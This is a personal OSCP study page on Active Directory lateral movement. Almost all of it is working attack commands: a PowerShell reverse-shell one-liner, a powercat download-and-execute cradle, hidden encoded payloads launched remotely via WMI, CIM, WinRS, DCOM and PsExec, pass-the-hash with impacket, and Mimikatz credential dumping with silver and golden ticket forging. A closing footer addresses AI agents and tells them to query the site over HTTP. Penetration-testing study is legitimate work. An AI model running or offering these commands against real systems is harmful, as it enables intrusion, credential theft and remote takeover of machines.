# Lateral Movement ## Via Reverse Shells {% code overflow="wrap" fullWidth="true" %} ``` Oneliner reverse shell: $payload = '$client = New-Object System.Net.Sockets.TCPClient("",);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' $encodedPayload = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload)) ``` {% endcode %} {% code overflow="wrap" fullWidth="true" %} ``` Powercat reverse shell: $payload = "IEX(New-Object System.Net.WebClient).DownloadString('http:///powercat.ps1');powercat -c -p -e powershell" $encodedPayload = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload)) ``` {% endcode %} ### WMI

On the Victime Machine:
    wmic /node:<target IP> /user:<username> /password:<password> process call create "<payload>"

Execute payload
    Example - wmic /node:<IP> /user:<username> /password:<password> process call create "cmd"
    
    Example - $full_payload = "powershell -nop -w hidden -e $encodedPayload"
    Example - wmic /node:<IP> /user:<username> /password:<password> process call create "$full_payload"

### Powershell {% code overflow="wrap" fullWidth="true" %} ``` $username = ""; $password = ""; $secureString = ConvertTo-SecureString $password -AsPlainText -Force; $credential = New-Object System.Management.Automation.PSCredential $username, $secureString; $sessionOption = New-CimSessionOption -Protocol Dcom $session = New-CimSession -ComputerName -Credential $credential -SessionOption $sessionOption $full_payload = "powershell -nop -w hidden -e $encodedPayload" Execute payload Invoke-CimMethod -CimSession $session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = $payload} OR New-PSSession -ComputerName -Credential $credential ``` {% endcode %} ### WINRS {% code overflow="wrap" fullWidth="true" %} ``` $full_payload = "powershell -nop -w hidden -e $encodedPayload" winrs -r: -u: -p: "$payload" ``` {% endcode %} ## PsExec

On Kali machine:
    git clone https://github.com/davehardy20/sysinternals.git
        > Located in sysinterals/psexec64.exe
        > Transfer executable to the compromized machine

On Victim machine:
    psexec64.exe -i \\<target IP/hostname> -u <domain name>\<username> -p "<password>" "<payload>"

## Passing the Hash {% code overflow="wrap" fullWidth="true" %} ``` On Kali machine: impacket-wmiexec @ -hashes : proxychains impacket-wmiexec @ -hashes : ``` {% endcode %} ## DCOM {% code overflow="wrap" fullWidth="true" %} ``` 1. Instantiate a remote MMC 2.0 application $dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","")) 2. Start up a listener to catch reverse shells on our kali nc -nlvp 4444 3. Generate the payload, and $full_payload = "powershell -nop -w hidden -e $encodedPayload" $dcom.Document.ActiveView.ExecuteShellCommand("",$null,"$full_payload","7") 4. Return to the listener on our kali, we should receive a reverse shell coming from the target machine. ``` {% endcode %} ## SSH private keys {% code overflow="wrap" fullWidth="true" %} ``` ssh-keygen -t rsa # Used to generate a ssh keypair ssh -i @ ssh -i @ -o IdentitiesOnly=yes # Use when there are multiple private keys in the .ssh directory ``` {% endcode %} ## Mimikatz {% code overflow="wrap" fullWidth="true" %} ``` ./mimikatz.exe privilege::debug Identify target service user NTLM hash: sekurlsa::logonpasswords Identify krbtgt NTLM hash: lsadump::lsa /patch Get Domain SID: whoami /user Overpass the Hash sekurlsa::pth /user: /ntlm: /domain: /run: net use \\ ./PsExec64.exe \\ Pass the Ticket sekurlsa::tickets /export # dir *.kirbi | findstr kerberos::ptt # Attempt to access the resource as the current user, the authentication process will now make use of the newly injected TGT Example: ls \\\ iwr -UseDefaultCredentials http:// Silver Ticket for specific service: kerberos::golden /rc4: /sid: /domain: /ptt /target: /service: /user: Golden Ticket for all services: kerberos::golden /user: /domain: /sid: /krbtgt: /ptt> Verify tickets with: klist ``` {% endcode %} ## Creating Users {% code overflow="wrap" fullWidth="true" %} ``` ``` {% endcode %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://personal-archive.gitbook.io/oscp-exam-prep/active-directory/lateral-movement.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.